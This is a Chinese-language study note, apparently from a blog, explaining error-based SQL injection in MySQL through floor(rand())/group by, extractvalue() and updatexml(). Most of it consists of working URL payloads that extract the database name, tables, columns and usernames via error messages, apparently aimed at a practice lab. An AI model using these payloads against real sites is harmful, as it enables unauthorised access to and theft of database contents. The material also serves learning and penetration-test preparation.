适用于界面不回显的场景,通过注入语句在报错信息中回显我们想要的信息
常用函数1:floor+rand 配合 count+group by函数
rand() 生成0-1之间的随机数,默认完全随机,加参数后固定随机(多次执行随机生成的数是固定的)
floor()取整
group by() 分组
count()计数
concat(字符串) 拼接字符串
group_concat(字段名) 拼接函数,针对列数据拼接
示例:#制造数据库错误信息,在错误信息中显示数据库名
?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+
#找表名
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 2,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
#找列名
?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand(0)*2)) as a from information_schema.columns group by a --+
#查找字段值
?id=-1' union select 1,count(*),concat((select username from users limit 1,1),floor(rand(0)*2)) as a from information_schema.columns group by a --+
#常用函数2:extractvalue() 报错
extractvalue(xml 对象,xpath_str) 从xml对象中返回查找到的字符串,返回长度限制在32位字符;Xpath_str 参数使用格式/xxx/xxx/xxx/,如果出现不符合上述格式的内容,就会报错;
示例:
?id=1' and extractvalue(1,concat("~",(select database()))) --+
?id=1' and extractvalue(1,concat("~",(select table_name from information_schema.tables where table_schema='security' limit 1,1))) --+
常用函数3:updatexml()报错
updatexml(xml_target,xpath_expr,new_xml)
Xml_target:xml对象的名称,string
Xpath_expr:使用xpath路径格式,不符合格式就会报错;比如路径中出现~符号
New_xml:需要更新的内容
标签:information,PTE,报错,select,--+,注入,id,concat,schema From: https://blog.csdn.net/xiaofengjia00/article/details/139358054示例:
?id=1' and updatexml(1,concat('~',(select database()),'~'),1) --+
?id=1' and updatexml(1,concat("~",(select table_name from information_schema.tables where table_schema='security' limit 1,1),"~"),1) --+
?id=1' and updatexml(1,concat("~",(select column_name from information_schema.columns where table_name='users' limit 2,1),"~"),1) --+